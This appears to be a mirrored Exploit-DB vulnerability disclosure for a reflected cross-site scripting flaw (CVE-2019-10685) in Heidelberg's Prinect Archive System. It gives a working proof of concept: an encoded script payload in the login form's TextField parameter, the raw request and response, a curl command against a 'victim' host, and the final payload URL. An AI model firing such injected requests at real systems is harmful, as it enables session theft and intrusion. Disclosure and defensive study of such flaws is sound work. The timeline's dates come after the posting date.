Prinect Archive System 2015 Release 2.6 – Cross-Site Scripting

  • 作者: alt3kx
    日期: 2019-05-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46804/
  • Details
    ================
    Software: Prinect Archive System 
    Version: v2015 Release 2.6 
    Homepage: https://www.heidelberg.com
    Advisory report: https://github.com/alt3kx/CVE-2019-10685
    CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10685
    CVSS: 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    CWE-79
    
    Description
    ================
    A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Print Archive System v2015 release 2.6
    
    Vulnerability
    ================
    The user supplied input containing JavaScript is echoed back in JavaScript code in an HTML response via the "TextField" parameter.
    
    Proof of concept
    ================
    
    Reflected XSS
    Payload: %3cscript%3ealert(1)%3c%2fscript%3e
    
    The offending GET request is: 
    
    GET /am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2 HTTP/1.1
    Host: victim_IP:8090
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
    Connection: close
    Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F
    
    Reflected XSS Reponse: 
    
    HTTP/1.1 200 OK
    Server: Apache-Coyote/1.1
    Content-Type: text/html;charset=UTF-8
    Date: Mon, 04 Feb 2019 13:15:12 GMT
    Connection: close
    
    [../snip]
    
    id="msgContainer">Authentication failed for: <script>alert(1)</script> <br/>Click Help button for more information about login permissions.</div>
    
    # curl -i -s -k -X GET
    
    -H "Host: victim:8090" 
    -H "Accept-Encoding: gzip, deflate" 
    -H "Accept: */*" 
    -H "Accept-Language: en-US,en-GB;q=0.9,en;q=0.8" 
    -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 
    -H "Connection: close" 
    -H "Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F" 
    -b "JSESSIONID=C665EA9A7594E736D39C93EA8763A01F" 
    "http://victim:8090/am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2" 
    --proxy http://127.0.0.1:8080
    
    Final payload into URL:
     
    http://victim_IP:8090/am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2
    
    Mitigations
    ================
    No more feedback from the vendor:
    https://www.heidelberg.com
    
    Disclosure policy
    ================
    We believes in responsible disclosure.
    Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report. 
    
    This vulnerability will be published if we do not receive a response to this report with 10 days.
    
    Timeline
    ================
    
    2019-02-04: Discovered
    2019-02-25: Retest PRO environment
    2019-03-25: Retest on researcher's ecosystem
    2019-04-02: Vendor notification
    2019-04-03: Vendor feedback received
    2019-04-08: Reminder sent
    2019-04-08: 2nd reminder sent 
    2019-04-11: Internal communication
    2019-04-26: No more feedback received from the vendor
    2019-05-30: New issues found
    2019-06-30: Public Disclosure
    
    Discovered by:
    Alex Hernandez aka alt3kx:
    ================
    Please visit https://github.com/alt3kx for more information.
    
    My current exploit list @exploit-db: 
    https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576